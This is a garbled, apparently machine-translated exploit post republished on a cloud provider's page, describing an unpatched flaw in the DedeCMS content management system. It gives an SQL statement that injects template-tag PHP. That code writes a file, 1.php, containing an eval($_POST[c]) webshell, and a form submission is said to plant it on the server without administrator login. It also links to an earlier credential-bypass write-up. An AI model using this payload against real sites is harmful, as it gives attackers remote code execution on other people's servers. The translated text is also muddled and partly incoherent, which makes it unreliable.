Dedecms's latest 0-day exploitation of WEBSHELL without entering the background

Source: Internet
Author: User
In combination with the brute-force Weaver dream, attackers can access the background without the Administrator account and password (http: www. tmdsb. com201108dedecms-weaving-dreams-seriously-0day-vulnerabilities-latest-storm) Take webshell method is as follows: network transmission are to know the background can be used, but do not, as long as the plus directory exists,

Vulnerabilities that can be exploited in the background without the Administrator account or password

Http://www.tmdsb.com/2011/08/dEdEcms-weaving-dreams-seriously-0day-vuLnErabilities-latest-stoRm/)

The webshell method is as follows:

All the data transmitted through the Internet is that the backend can be used, but no, as long as the plus directory exists, the server can be connected externally, and shell can be used.

Prerequisites: You must prepare your own dede database and then insert the data:

insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'
     eval($_POST[c]) ?>\');echo "OK";@fclose($fp);{/dede:php}');

Submit the statement using the following form, and shell will be 1.php in the same directory. The principle of self-study...

《script》function addaction(){document.QuickSearch.action=document.QuickSearch.doaction.value;}《script》

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.